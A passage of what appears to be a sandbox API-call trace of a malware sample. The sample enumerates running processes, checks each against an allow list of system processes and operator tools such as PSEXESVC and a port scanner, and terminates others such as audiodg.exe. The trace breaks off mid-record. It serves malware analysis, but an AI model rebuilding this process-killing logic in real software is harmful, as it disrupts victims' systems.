lstrcmpiW (lpString1="services.exe", lpString2="ctfmon.exe") returned 1 [0030.132] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.132] lstrcmpiW (lpString1="services.exe", lpString2="lsass.exe") returned 1 [0030.132] lstrlenW (lpString="lsass.exe") returned 9 [0030.132] lstrcmpiW (lpString1="services.exe", lpString2="services.exe") returned 0 [0030.132] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0030.132] lstrcmpiW (lpString1="lsass.exe", lpString2="[System process]") returned 1 [0030.132] lstrlenW (lpString="[System process]") returned 16 [0030.132] lstrcmpiW (lpString1="lsass.exe", lpString2="System") returned -1 [0030.132] lstrlenW (lpString="System") returned 6 [0030.132] lstrcmpiW (lpString1="lsass.exe", lpString2="smss.exe") returned -1 [0030.132] lstrlenW (lpString="smss.exe") returned 8 [0030.132] lstrcmpiW (lpString1="lsass.exe", lpString2="dllhost.exe") returned 1 [0030.132] lstrlenW (lpString="dllhost.exe") returned 11 [0030.132] lstrcmpiW (lpString1="lsass.exe", lpString2="svchost.exe") returned -1 [0030.132] lstrlenW (lpString="svchost.exe") returned 11 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="csrss.exe") returned 1 [0030.133] lstrlenW (lpString="csrss.exe") returned 9 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="Microsoft.ActiveDirectory") returned -1 [0030.133] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="WebServices.exe") returned -1 [0030.133] lstrlenW (lpString="WebServices.exe") returned 15 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="cmd.exe") returned 1 [0030.133] lstrlenW (lpString="cmd.exe") returned 7 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="mstsc.exe") returned -1 [0030.133] lstrlenW (lpString="mstsc.exe") returned 9 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="find.exe") returned 1 [0030.133] lstrlenW (lpString="find.exe") returned 8 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="conhost.exe") returned 1 [0030.133] lstrlenW (lpString="conhost.exe") returned 11 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="explorer.exe") returned 1 [0030.133] lstrlenW (lpString="explorer.exe") returned 12 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="ctfmon.exe") returned 1 [0030.133] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.133] lstrcmpiW (lpString1="lsass.exe", lpString2="lsass.exe") returned 0 [0030.133] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="[System process]") returned 1 [0030.134] lstrlenW (lpString="[System process]") returned 16 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="System") returned -1 [0030.134] lstrlenW (lpString="System") returned 6 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="smss.exe") returned -1 [0030.134] lstrlenW (lpString="smss.exe") returned 8 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="dllhost.exe") returned 1 [0030.134] lstrlenW (lpString="dllhost.exe") returned 11 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="svchost.exe") returned -1 [0030.134] lstrlenW (lpString="svchost.exe") returned 11 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="csrss.exe") returned 1 [0030.134] lstrlenW (lpString="csrss.exe") returned 9 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="Microsoft.ActiveDirectory") returned -1 [0030.134] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="WebServices.exe") returned -1 [0030.134] lstrlenW (lpString="WebServices.exe") returned 15 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="cmd.exe") returned 1 [0030.134] lstrlenW (lpString="cmd.exe") returned 7 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="mstsc.exe") returned -1 [0030.134] lstrlenW (lpString="mstsc.exe") returned 9 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="find.exe") returned 1 [0030.134] lstrlenW (lpString="find.exe") returned 8 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="conhost.exe") returned 1 [0030.134] lstrlenW (lpString="conhost.exe") returned 11 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="explorer.exe") returned 1 [0030.134] lstrlenW (lpString="explorer.exe") returned 12 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="ctfmon.exe") returned 1 [0030.134] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="lsass.exe") returned 1 [0030.134] lstrlenW (lpString="lsass.exe") returned 9 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="services.exe") returned -1 [0030.134] lstrlenW (lpString="services.exe") returned 12 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="tasklist.exe") returned -1 [0030.134] lstrlenW (lpString="tasklist.exe") returned 12 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="winlogon.exe") returned -1 [0030.134] lstrlenW (lpString="winlogon.exe") returned 12 [0030.134] lstrcmpiW (lpString1="lsm.exe", lpString2="wmiprvse.exe") returned -1 [0030.135] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="msdts.exe") returned -1 [0030.135] lstrlenW (lpString="msdts.exe") returned 9 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="bfsvc.exe") returned 1 [0030.135] lstrlenW (lpString="bfsvc.exe") returned 9 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="AdapterTroubleshooter.exe") returned 1 [0030.135] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="alg.exe") returned 1 [0030.135] lstrlenW (lpString="alg.exe") returned 7 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="dwm.exe") returned 1 [0030.135] lstrlenW (lpString="dwm.exe") returned 7 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="issch.exe") returned 1 [0030.135] lstrlenW (lpString="issch.exe") returned 9 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="rundll32.exe") returned -1 [0030.135] lstrlenW (lpString="rundll32.exe") returned 12 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="spoolsv.exe") returned -1 [0030.135] lstrlenW (lpString="spoolsv.exe") returned 11 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="wininit.exe") returned -1 [0030.135] lstrlenW (lpString="wininit.exe") returned 11 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="wmiprvse.exe") returned -1 [0030.135] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="wudfhost.exe") returned -1 [0030.135] lstrlenW (lpString="wudfhost.exe") returned 12 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="taskmgr.exe") returned -1 [0030.135] lstrlenW (lpString="taskmgr.exe") returned 11 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="rdpclip.exe") returned -1 [0030.135] lstrlenW (lpString="rdpclip.exe") returned 11 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="logonui.exe") returned 1 [0030.135] lstrlenW (lpString="logonui.exe") returned 11 [0030.135] lstrcmpiW (lpString1="lsm.exe", lpString2="lsm.exe") returned 0 [0030.135] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.136] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.136] lstrlenW (lpString="[System process]") returned 16 [0030.136] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.136] lstrlenW (lpString="System") returned 6 [0030.136] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.136] lstrlenW (lpString="smss.exe") returned 8 [0030.136] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.136] lstrlenW (lpString="dllhost.exe") returned 11 [0030.136] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.136] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.137] lstrlenW (lpString="[System process]") returned 16 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.137] lstrlenW (lpString="System") returned 6 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.137] lstrlenW (lpString="smss.exe") returned 8 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.137] lstrlenW (lpString="dllhost.exe") returned 11 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.137] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.137] lstrlenW (lpString="[System process]") returned 16 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.137] lstrlenW (lpString="System") returned 6 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.137] lstrlenW (lpString="smss.exe") returned 8 [0030.137] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.138] lstrlenW (lpString="dllhost.exe") returned 11 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.138] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.138] lstrlenW (lpString="[System process]") returned 16 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.138] lstrlenW (lpString="System") returned 6 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.138] lstrlenW (lpString="smss.exe") returned 8 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.138] lstrlenW (lpString="dllhost.exe") returned 11 [0030.138] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.138] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.139] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.139] lstrlenW (lpString="[System process]") returned 16 [0030.139] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.139] lstrlenW (lpString="System") returned 6 [0030.139] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.139] lstrlenW (lpString="smss.exe") returned 8 [0030.139] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.139] lstrlenW (lpString="dllhost.exe") returned 11 [0030.139] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.139] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="[System process]") returned 1 [0030.140] lstrlenW (lpString="[System process]") returned 16 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="System") returned -1 [0030.140] lstrlenW (lpString="System") returned 6 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="smss.exe") returned -1 [0030.140] lstrlenW (lpString="smss.exe") returned 8 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="dllhost.exe") returned -1 [0030.140] lstrlenW (lpString="dllhost.exe") returned 11 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="svchost.exe") returned -1 [0030.140] lstrlenW (lpString="svchost.exe") returned 11 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="csrss.exe") returned -1 [0030.140] lstrlenW (lpString="csrss.exe") returned 9 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="Microsoft.ActiveDirectory") returned -1 [0030.140] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="WebServices.exe") returned -1 [0030.140] lstrlenW (lpString="WebServices.exe") returned 15 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="cmd.exe") returned -1 [0030.140] lstrlenW (lpString="cmd.exe") returned 7 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="mstsc.exe") returned -1 [0030.140] lstrlenW (lpString="mstsc.exe") returned 9 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="find.exe") returned -1 [0030.140] lstrlenW (lpString="find.exe") returned 8 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="conhost.exe") returned -1 [0030.140] lstrlenW (lpString="conhost.exe") returned 11 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="explorer.exe") returned -1 [0030.140] lstrlenW (lpString="explorer.exe") returned 12 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="ctfmon.exe") returned -1 [0030.140] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="lsass.exe") returned -1 [0030.140] lstrlenW (lpString="lsass.exe") returned 9 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="services.exe") returned -1 [0030.140] lstrlenW (lpString="services.exe") returned 12 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="tasklist.exe") returned -1 [0030.140] lstrlenW (lpString="tasklist.exe") returned 12 [0030.140] lstrcmpiW (lpString1="audiodg.exe", lpString2="winlogon.exe") returned -1 [0030.141] lstrlenW (lpString="winlogon.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="wmiprvse.exe") returned -1 [0030.141] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="msdts.exe") returned -1 [0030.141] lstrlenW (lpString="msdts.exe") returned 9 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="bfsvc.exe") returned -1 [0030.141] lstrlenW (lpString="bfsvc.exe") returned 9 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="AdapterTroubleshooter.exe") returned 1 [0030.141] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="alg.exe") returned 1 [0030.141] lstrlenW (lpString="alg.exe") returned 7 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="dwm.exe") returned -1 [0030.141] lstrlenW (lpString="dwm.exe") returned 7 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="issch.exe") returned -1 [0030.141] lstrlenW (lpString="issch.exe") returned 9 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="rundll32.exe") returned -1 [0030.141] lstrlenW (lpString="rundll32.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="spoolsv.exe") returned -1 [0030.141] lstrlenW (lpString="spoolsv.exe") returned 11 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="wininit.exe") returned -1 [0030.141] lstrlenW (lpString="wininit.exe") returned 11 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="wmiprvse.exe") returned -1 [0030.141] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="wudfhost.exe") returned -1 [0030.141] lstrlenW (lpString="wudfhost.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="taskmgr.exe") returned -1 [0030.141] lstrlenW (lpString="taskmgr.exe") returned 11 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="rdpclip.exe") returned -1 [0030.141] lstrlenW (lpString="rdpclip.exe") returned 11 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="logonui.exe") returned -1 [0030.141] lstrlenW (lpString="logonui.exe") returned 11 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="lsm.exe") returned -1 [0030.141] lstrlenW (lpString="lsm.exe") returned 7 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="searchui.exe") returned -1 [0030.141] lstrlenW (lpString="searchui.exe") returned 12 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="searchindexer.exe") returned -1 [0030.141] lstrlenW (lpString="searchindexer.exe") returned 17 [0030.141] lstrcmpiW (lpString1="audiodg.exe", lpString2="processhacker.exe") returned -1 [0030.141] lstrlenW (lpString="processhacker.exe") returned 17 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="getpassvord_x64.exe") returned -1 [0030.142] lstrlenW (lpString="getpassvord_x64.exe") returned 19 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="64.exe") returned 1 [0030.142] lstrlenW (lpString="64.exe") returned 6 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="32.exe") returned 1 [0030.142] lstrlenW (lpString="32.exe") returned 6 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="mshta.exe") returned -1 [0030.142] lstrlenW (lpString="mshta.exe") returned 9 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="fontdrvhost.exe") returned -1 [0030.142] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="sihost.exe") returned -1 [0030.142] lstrlenW (lpString="sihost.exe") returned 10 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="pscan24.exe") returned -1 [0030.142] lstrlenW (lpString="pscan24.exe") returned 11 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="advanced_port_scanner.exe") returned 1 [0030.142] lstrlenW (lpString="advanced_port_scanner.exe") returned 25 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="advanced_port_scanner_console.exe") returned 1 [0030.142] lstrlenW (lpString="advanced_port_scanner_console.exe") returned 33 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="pscan24.tmp") returned -1 [0030.142] lstrlenW (lpString="pscan24.tmp") returned 11 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="PSEXESVC.exe") returned -1 [0030.142] lstrlenW (lpString="PSEXESVC.exe") returned 12 [0030.142] lstrcmpiW (lpString1="audiodg.exe", lpString2="dfssvc.exe") returned -1 [0030.142] lstrlenW (lpString="dfssvc.exe") returned 10 [0030.142] GetCurrentProcessId () returned 0x9c0 [0030.142] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x3a8) returned 0xd0 [0030.142] TerminateProcess (hProcess=0xd0, uExitCode=0x0) returned 1 [0030.159] CloseHandle (hObject=0xd0) returned 1 [0030.159] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.160] lstrlenW (lpString="[System process]") returned 16 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.160] lstrlenW (lpString="System") returned 6 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.160] lstrlenW (lpString="smss.exe") returned 8 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.160] lstrlenW (lpString="dllhost.exe") returned 11 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.160] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="[System process]") returned 1 [0030.160] lstrlenW (lpString="[System process]") returned 16 [0030.160] lstrcmpiW (lpString1="svchost.exe", lpString2="System") returned -1 [0030.161] lstrlenW (lpString="System") returned 6 [0030.161] lstrcmpiW (lpString1="svchost.exe", lpString2="smss.exe") returned 1 [0030.161] lstrlenW (lpString="smss.exe") returned 8 [0030.161] lstrcmpiW (lpString1="svchost.exe", lpString2="dllhost.exe") returned 1 [0030.161] lstrlenW (lpString="dllhost.exe") returned 11 [0030.161] lstrcmpiW (lpString1="svchost.exe", lpString2="svchost.exe") returned 0 [0030.161] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0030.161] lstrcmpiW (lpString1="dwm.exe", lpString2="[System process]") returned 1 [0030.161] lstrlenW (lpString="[System process]") returned 16 [0030.161] lstrcmpiW (lpString1="dwm.exe", lpString2="System") returned -1 [0030.161] lstrlenW (lpString="System") returned 6 [0030.161] lstrcmpiW (lpString1="dwm.exe", lpString2="smss.exe") returned -1 [0030.161] lstrlenW (lpString="smss.exe") returned 8 [0030.161] lstrcmpiW (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0030.162] lstrlenW (lpString="dllhost.exe") returned 11 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0030.162] lstrlenW (lpString="svchost.exe") returned 11 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="csrss.exe") returned 1 [0030.162] lstrlenW (lpString="csrss.exe") returned 9 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="Microsoft.ActiveDirectory") returned -1 [0030.162] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="WebServices.exe") returned -1 [0030.162] lstrlenW (lpString="WebServices.exe") returned 15 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="cmd.exe") returned 1 [0030.162] lstrlenW (lpString="cmd.exe") returned 7 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="mstsc.exe") returned -1 [0030.162] lstrlenW (lpString="mstsc.exe") returned 9 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="find.exe") returned -1 [0030.162] lstrlenW (lpString="find.exe") returned 8 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="conhost.exe") returned 1 [0030.162] lstrlenW (lpString="conhost.exe") returned 11 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0030.162] lstrlenW (lpString="explorer.exe") returned 12 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="ctfmon.exe") returned 1 [0030.162] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="lsass.exe") returned -1 [0030.162] lstrlenW (lpString="lsass.exe") returned 9 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="services.exe") returned -1 [0030.162] lstrlenW (lpString="services.exe") returned 12 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="tasklist.exe") returned -1 [0030.162] lstrlenW (lpString="tasklist.exe") returned 12 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="winlogon.exe") returned -1 [0030.162] lstrlenW (lpString="winlogon.exe") returned 12 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="wmiprvse.exe") returned -1 [0030.162] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="msdts.exe") returned -1 [0030.162] lstrlenW (lpString="msdts.exe") returned 9 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="bfsvc.exe") returned 1 [0030.162] lstrlenW (lpString="bfsvc.exe") returned 9 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="AdapterTroubleshooter.exe") returned 1 [0030.162] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0030.162] lstrcmpiW (lpString1="dwm.exe", lpString2="alg.exe") returned 1 [0030.162] lstrlenW (lpString="alg.exe") returned 7 [0030.163] lstrcmpiW (lpString1="dwm.exe", lpString2="dwm.exe") returned 0 [0030.163] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="[System process]") returned 1 [0030.163] lstrlenW (lpString="[System process]") returned 16 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="System") returned -1 [0030.163] lstrlenW (lpString="System") returned 6 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="smss.exe") returned -1 [0030.163] lstrlenW (lpString="smss.exe") returned 8 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1 [0030.163] lstrlenW (lpString="dllhost.exe") returned 11 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1 [0030.163] lstrlenW (lpString="svchost.exe") returned 11 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1 [0030.163] lstrlenW (lpString="csrss.exe") returned 9 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="Microsoft.ActiveDirectory") returned -1 [0030.163] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="WebServices.exe") returned -1 [0030.163] lstrlenW (lpString="WebServices.exe") returned 15 [0030.163] lstrcmpiW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1 [0030.164] lstrlenW (lpString="cmd.exe") returned 7 [0030.164] lstrcmpiW (lpString1="explorer.exe", lpString2="mstsc.exe") returned -1 [0030.164] lstrlenW (lpString="mstsc.exe") returned 9 [0030.164] lstrcmpiW (lpString1="explorer.exe", lpString2="find.exe") returned -1 [0030.164] lstrlenW (lpString="find.exe") returned 8 [0030.164] lstrcmpiW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1 [0030.164] lstrlenW (lpString="conhost.exe") returned 11 [0030.164] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0030.164] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, 